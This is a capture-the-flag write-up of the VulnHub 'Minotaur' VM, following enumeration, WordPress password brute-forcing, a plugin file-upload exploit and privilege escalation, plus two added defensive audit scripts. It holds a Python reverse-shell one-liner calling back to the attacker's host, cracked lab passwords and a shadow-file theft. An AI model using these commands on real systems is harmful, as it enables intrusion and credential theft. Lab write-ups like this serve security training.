Minotaur

Available from VulnHub

This boot2root CTF from SecTalks was described as having some password cracking challenges, among other things. I had a good time with this one, so here we go!

Initial scan:

root@notKali:~# nmap -sT -sV -v -A 192.168.56.223

Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-04-15 22:26 EDT
NSE: Loaded 138 scripts for scanning.
----SNIP----
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 ed:74:0c:c9:21:c4:58:47:d4:02:89:c7:e5:3e:09:18 (DSA)
|   2048 0c:4b:a8:24:7e:fc:cd:8a:b1:9f:87:dd:9d:06:30:05 (RSA)
|_  256 40:9b:fe:f9:82:41:17:93:a2:96:34:25:1c:53:bb:ae (ECDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2020/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
MAC Address: 08:00:27:75:F8:9D (Oracle VirtualBox virtual NIC)

Enumeration

I dug into the FTP server on port 2020 for a little bit, but didn’t find anything useful. So I turned to a dirb scan against the web server:

jason@notKali:~$ dirb http://192.168.56.223 /opt/SecLists/Discovery/Web_Content/raft-medium-words.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Apr 17 20:49:25 2016
URL_BASE: http://192.168.56.223/
WORDLIST_FILES: /opt/SecLists/Discovery/Web_Content/raft-medium-words.txt

-----------------

GENERATED WORDS: 63087                                                         

---- Scanning URL: http://192.168.56.223/ ----
+ http://192.168.56.223/.php (CODE:403|SIZE:285)                                                                                                                     
+ http://192.168.56.223/. (CODE:200|SIZE:11510)                                                                                                                      
+ http://192.168.56.223/.php3 (CODE:403|SIZE:286)                                                                                                                    
+ http://192.168.56.223/.phtml (CODE:403|SIZE:287)                                                                                                                   
+ http://192.168.56.223/.php5 (CODE:403|SIZE:286)                                                                                                                    
+ http://192.168.56.223/.php4 (CODE:403|SIZE:286)                                                                                                                    
+ http://192.168.56.223/server-status (CODE:403|SIZE:294)                                                                                                            
+ http://192.168.56.223/.phps (CODE:403|SIZE:286)                                                                                                                    
==> DIRECTORY: http://192.168.56.223/bull/                                                                                                                           
                                                                                                                                                                     
---- Entering directory: http://192.168.56.223/bull/ ----
+ http://192.168.56.223/bull/.php (CODE:403|SIZE:290)                                                                                                                
==> DIRECTORY: http://192.168.56.223/bull/wp-admin/                                                                                                                  
==> DIRECTORY: http://192.168.56.223/bull/wp-includes/                                                                                                               
==> DIRECTORY: http://192.168.56.223/bull/wp-content/                                                                                                                
+ http://192.168.56.223/bull/. (CODE:200|SIZE:16057)                                                                                                                 
+ http://192.168.56.223/bull/.php3 (CODE:403|SIZE:291)                                                                                                               
+ http://192.168.56.223/bull/.phtml (CODE:403|SIZE:292)                                                                                                              
+ http://192.168.56.223/bull/.php5 (CODE:403|SIZE:291)                                                                                                               
+ http://192.168.56.223/bull/.php4 (CODE:403|SIZE:291)                                                                                                               
+ http://192.168.56.223/bull/.phps (CODE:403|SIZE:291)                                                                                                               

----SNIP----

DOWNLOADED: 567783 - FOUND: 64

This looks like a WordPress installation, so I’ll try WPScan.

jason@notKali:/opt/wpscan$ ./wpscan.rb --url 192.168.56.223/bull
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.56.223/bull/
[+] Started: Sun Apr 17 21:14:42 2016

[!] The WordPress 'http://192.168.56.223/bull/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.6
[+] XML-RPC Interface available under: http://192.168.56.223/bull/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.56.223/bull/wp-content/uploads/

[+] WordPress version 4.2.2 identified from advanced fingerprinting
[!] 12 vulnerabilities identified from the version number

[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8111
    Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
    Reference: https://twitter.com/klikkioy/status/624264122570526720
    Reference: https://klikki.fi/adv/wordpress3.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3

[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection 
    Reference: https://wpvulndb.com/vulnerabilities/8126
    Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
    Reference: https://wpvulndb.com/vulnerabilities/8130
    Reference: https://core.trac.wordpress.org/changeset/33536
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8131
    Reference: https://core.trac.wordpress.org/changeset/33529
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8132
    Reference: https://core.trac.wordpress.org/changeset/33541
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8133
    Reference: https://core.trac.wordpress.org/changeset/33549
    Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8186
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8187
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - Publish Post and Mark as Sticky Permission Issue
    Reference: https://wpvulndb.com/vulnerabilities/8188
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5

[!] Title: WordPress  3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8358
    Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6

[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
    Reference: https://wpvulndb.com/vulnerabilities/8376
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/36435
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7

[!] Title: WordPress 3.7-4.4.1 - Open Redirect
    Reference: https://wpvulndb.com/vulnerabilities/8377
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/36444
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7

[+] WordPress theme in use: twentyfourteen - v1.4

[+] Name: twentyfourteen - v1.4
 |  Location: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/
[!] The version is out of date, the latest version is 1.7
 |  Style URL: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/style.css
 |  Theme Name: Twenty Fourteen
 |  Theme URI: https://wordpress.org/themes/twentyfourteen/
 |  Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
 | 1 plugin found:

[+] Name: slideshow-gallery - v1.4.6
 |  Location: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/
 |  Readme: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/readme.txt
[!] The version is out of date, the latest version is 1.6.3
[!] Directory listing is enabled: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/

[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
    Reference: https://wpvulndb.com/vulnerabilities/7532
    Reference: http://seclists.org/bugtraq/2014/Sep/1
    Reference: http://packetstormsecurity.com/files/131526/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
    Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
    Reference: https://www.exploit-db.com/exploits/34681/
    Reference: https://www.exploit-db.com/exploits/34514/
[i] Fixed in: 1.4.7

[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) 
    Reference: https://wpvulndb.com/vulnerabilities/8263
    Reference: http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
    Reference: http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
[i] Fixed in: 1.5.3.4

[+] Finished: Sun Apr 17 21:14:48 2016
[+] Requests Done: 45
[+] Memory used: 52.285 MB
[+] Elapsed time: 00:00:05

Mostly XSS… The arbitrary file upload in the Slideshow Gallery plugin looks promising. It requires authentication, so I’ll enumerate the blog’s users with WPScan:

jason@notKali:/opt/wpscan$ ./wpscan.rb --url 192.168.56.223/bull --enumerate u
---SNIP---
[+] Enumerating usernames ...
[+] Identified the following 1 users:
    +----+-------+-------+
    | Id | Login | Name  |
    +----+-------+-------+
    | 1  | bully | bully |
    +----+-------+-------+

I tried several password lists from SecLists but came up empty, so I decided to generate a list with CeWL from the WordPress installation itself.

jason@notKali:~/Dev/cewl$ ./cewl.rb -m 6 -w /home/jason/passwords.txt http://192.168.56.223/bull
CeWL 5.1 Robin Wood (robin@digi.ninja) (http://digi.ninja)

I’ll pass this through John the Ripper’s rules:

jason@notKali:~/Dev/jtr/john-1.8.0-jumbo-1/run$ ./john --wordlist=/home/jason/passwords.txt --stdout --rules > /home/jason/password-rules.txt
Press 'q' or Ctrl-C to abort, almost any other key for status
14200p 0:00:00:00 100.00% (2016-04-18 09:20) 157777p/s Feeding

And then pass that back to WPScan for brute forcing:

jason@notKali:/opt/wpscan$ ./wpscan.rb --url 192.168.56.223/bull --wordlist /home/jason/password-rules.txt --username bully
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.56.223/bull/
[+] Started: Mon Apr 18 09:20:36 2016
---SNIP---
[+] Starting the password brute forcer
  [+] [SUCCESS] Login : bully Password : Bighornedbulls                                                                                                               

  Brute Forcing 'bully' Time: 00:06:19 <===============================================================================        > (12944 / 14201) 91.14%  ETA: 00:00:37
  +----+-------+------+----------------+
  | Id | Login | Name | Password       |
  +----+-------+------+----------------+
  |    | bully |      | Bighornedbulls |
  +----+-------+------+----------------+

[+] Finished: Mon Apr 18 09:27:00 2016
[+] Requests Done: 12995
[+] Memory used: 88.52 MB
[+] Elapsed time: 00:06:23

The Dirty!

Now that I can log in as a user, I’ll take a look at the vulnerability from earlier, the Slideshow Gallery arbitrary file upload. I uploaded my favorite PHP reverse shell, configured it, and set up a listener.

jason@notKali:~/tmp$ python wp_gallery.py -t http://192.168.56.223/bull -f ./php-reverse-shell-1.0/php-reverse-shell.php -u bully -p Bighornedbulls
---SNIP---
[+] Username & password ACCEPTED!

[!] Shell Uploaded!
[+] Check url: http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/./php-reverse-shell-1.0/php-reverse-shell.php (lowercase!!!!)

jason@notKali:~/tmp$ nc -lnvp 10400
Listening on [0.0.0.0] (family 0, port 10400)
Connection from [192.168.56.223] port 10400 [tcp/*] accepted (family 2, sport 54112)
Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
 21:21:44 up 2 days,  9:08,  0 users,  load average: 0.00, 0.01, 0.05
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ python -c "import pty; pty.spawn('/bin/bash')"
 www-data@minotaur:/$

I initially had some issues with typed input being echoed back when spawning bash from Python, so I sent a second Python reverse shell back to my listener:

$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.22",10401));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
_________

jason@notKali:~/tmp$ nc -lnvp 10401
Listening on [0.0.0.0] (family 0, port 10401)
Connection from [192.168.56.223] port 10401 [tcp/*] accepted (family 2, sport 50334)
/bin/sh: 0: can't access tty; job control turned off
$ ls
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
$ python -c 'import pty;pty.spawn("/bin/bash")'

I did some digging around and found MySQL credentials in wp-config.php. However, these didn’t really get me anywhere.

/** MySQL database username */
define('DB_USER', 'bully');

/** MySQL database password */
define('DB_PASSWORD', 'Might3*as#FG(');

I browsed to /tmp and found another flag:

www-data@minotaur:/tmp$ cat flag.txt
cat flag.txt
That shadow.bak file is probably useful, hey?
Also, you found a flag!
My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h y@R|)
www-data@minotaur:/tmp$ cp shadow.bak /var/www/html/shadow.bak
cp shadow.bak /var/www/html/shadow.bak
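
A stray, world-readable copy of the shadow file in /tmp is the kind of thing a host audit should catch before anyone else does. As an added example (not code from the original write-up), the script below walks a set of directories, recognises files whose lines follow the shadow(5) layout, and reports whether each one is readable by others. The sample shadow.bak it writes into a temporary directory is constructed, and its hash bodies are placeholders.

```python
"""Find copies of /etc/shadow that have strayed into world-readable places.

Added example, not from the original write-up. Directory layout, file
contents and function names are all constructed for the demonstration.
"""
import os
import re
import stat
import tempfile

# name : hash (or ! / * for a locked account) : lastchg:min:max:warn:inactive:expire:reserved
_SHADOW_LINE = re.compile(
    r"^[a-z_][a-z0-9_-]*:(?:[!*]*\$[0-9a-z]+\$[^:]*|[!*]*)(?::\d*){7}$"
)


def looks_like_shadow(path, min_lines=2):
    """True if at least `min_lines` lines of the file match the shadow(5) layout."""
    hits = 0
    try:
        with open(path, "r", errors="replace") as fh:
            for line in fh:
                if _SHADOW_LINE.match(line.rstrip("\n")):
                    hits += 1
                    if hits >= min_lines:
                        return True
    except OSError:
        return False
    return False


def find_stray_shadow_copies(roots):
    """Walk `roots`; return (path, world_readable) for every shadow-format file found."""
    found = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                if os.path.islink(path) or not os.path.isfile(path):
                    continue
                if looks_like_shadow(path):
                    mode = os.stat(path).st_mode
                    found.append((path, bool(mode & stat.S_IROTH)))
    return found


# Constructed sample resembling a shadow backup; the hash bodies are placeholders, not real.
SAMPLE_SHADOW = (
    "root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:16500:0:99999:7:::\n"
    "heffer:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:16500:0:99999:7:::\n"
    "minotaur:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:16500:0:99999:7:::\n"
    "www-data:*:16500:0:99999:7:::\n"
)


def demo():
    """Drop the sample into a temp dir as a world-readable shadow.bak and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        bak = os.path.join(tmp, "shadow.bak")
        with open(bak, "w") as fh:
            fh.write(SAMPLE_SHADOW)
        os.chmod(bak, 0o644)  # the weak permission the scan should flag
        with open(os.path.join(tmp, "notes.txt"), "w") as fh:
            fh.write("just a text file, not a shadow copy\n")
        results = find_stray_shadow_copies([tmp])
        return [(os.path.basename(p), readable) for p, readable in results]


if __name__ == "__main__":
    for name, readable in demo():
        print(name, "world-readable" if readable else "not world-readable")
```

Pointing find_stray_shadow_copies at /tmp, /var/tmp, /home and the web root is the realistic use on a box like this one.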

I grabbed shadow.bak with wget from the web root I had copied it to, and fired up John to crack it.

jason@notKali:~/Dev/jtr/john-1.8.0-jumbo-1/run$ ./john /home/jason/tmp/shadow.bak 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 64/64 OpenSSL])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1        (heffer)
obiwan6          (minotaur)
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

I tried heffer’s credentials first:

jason@notKali:~/tmp$ ssh heffer@192.168.56.223
heffer@192.168.56.223's password: 
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.16.0-30-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Apr 19 22:23:25 AEST 2016

  System load:  0.0               Processes:           99
  Usage of /:   8.7% of 18.81GB   Users logged in:     0
  Memory usage: 25%               IP address for eth0: 192.168.56.223
  Swap usage:   1%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Tue Apr 19 22:19:44 2016 from 192.168.56.22
heffer@minotaur:~$ ls
flag.txt
heffer@minotaur:~$ cat flag.txt 
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 fl@G 15: m00000 y0

So let’s try minotaur:

jason@notKali:~$ ssh minotaur@192.168.56.223
minotaur@192.168.56.223's password: 
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.16.0-30-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Apr 19 22:19:43 AEST 2016

  System load:  0.08              Processes:           97
  Usage of /:   8.7% of 18.81GB   Users logged in:     0
  Memory usage: 24%               IP address for eth0: 192.168.56.223
  Swap usage:   1%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May 27 16:55:30 2015
minotaur@minotaur:~$ ls
flag.txt  peda
minotaur@minotaur:~$ cat flag.txt 
Congrats! You've found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!

But can you get /root/flag.txt ?
minotaur@minotaur:~$ sudo -l
Matching Defaults entries for minotaur on minotaur:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User minotaur may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
    (ALL : ALL) ALL
minotaur@minotaur:~$ sudo -i
[sudo] password for minotaur: 
root@minotaur:~# ls
flag.txt  peda  quotes.txt
root@minotaur:~# cat quotes.txt 
And for me the only way to live life is to grab the bull but the horns and call up recording studios and set dates to go in recording studios. To try and accomplish somthing.
If you can't dazzle them with brilliance, baffle them with bull.
I admire bull riders for their passion and the uniqueness each one of them has.
I am a huge bull on this country. We will not have a double-dip recession at all. I see our businesses coming back almost across the board.
Not only the bull attacks his enemies with curved horn, but also the sheep, when harmed fights fights back.
Sometimes I'm kind of spacey. I'm like Ferdinand the bull, sniffing the daisey, not aware of time, of what's going on in the world.
There comes a time in the affairs of man when he must take the bull by the tail and face the situation.
Bulls do not win full fights. People do.
root@minotaur:~# cat flag.txt 
Congrats! You got the final flag!
Th3 Fl@g is: 5urr0nd3d bY @r$3h0l35
root@minotaur:~# whoami
root
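
The sudo -l listing above is what decided this box: a passwordless script entry and, next to it, a catch-all (ALL : ALL) ALL that still asked for minotaur’s password but gave up root regardless. As an added example (not code from the original write-up), the script below parses sudo -l output of that shape and ranks each entry; the sample text is constructed to mirror the listing shown for the minotaur account, and the function names are my own.

```python
"""Audit `sudo -l` output for entries that hand a user root without a real barrier.

Added example, not code from the original write-up. The sample text is
constructed to mirror the `sudo -l` listing for the minotaur account.
"""
import re

# Constructed sample, mirroring the write-up's `sudo -l` listing.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for minotaur on minotaur:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User minotaur may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
    (ALL : ALL) ALL
"""

# "(runas_user : runas_group) TAG: TAG: command" -- the group and the tags are optional.
_ENTRY = re.compile(
    r"^\((?P<user>[^:)]+?)(?:\s*:\s*(?P<group>[^)]+?))?\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$"
)


def parse_sudo_l(text):
    """Return the command entries as dicts; the Defaults block is skipped."""
    entries = []
    in_commands = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line:
            continue
        m = _ENTRY.match(line)
        if m is None:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        entries.append({
            "runas_user": m.group("user").strip(),
            "tags": tags,
            "cmd": m.group("cmd").strip(),
        })
    return entries


def audit(entries):
    """Rank each root-capable entry: any command, a passwordless command, or a plain command."""
    findings = []
    for e in entries:
        if e["runas_user"] not in ("ALL", "root"):
            continue
        if e["cmd"] == "ALL":
            findings.append(("CRITICAL", "unrestricted sudo to root"))
        elif "NOPASSWD" in e["tags"]:
            findings.append(("HIGH", "passwordless root command: " + e["cmd"]))
        else:
            findings.append(("INFO", "root command, password required: " + e["cmd"]))
    return findings


if __name__ == "__main__":
    for level, msg in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(level, msg)
```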

Thanks for the fun challenge!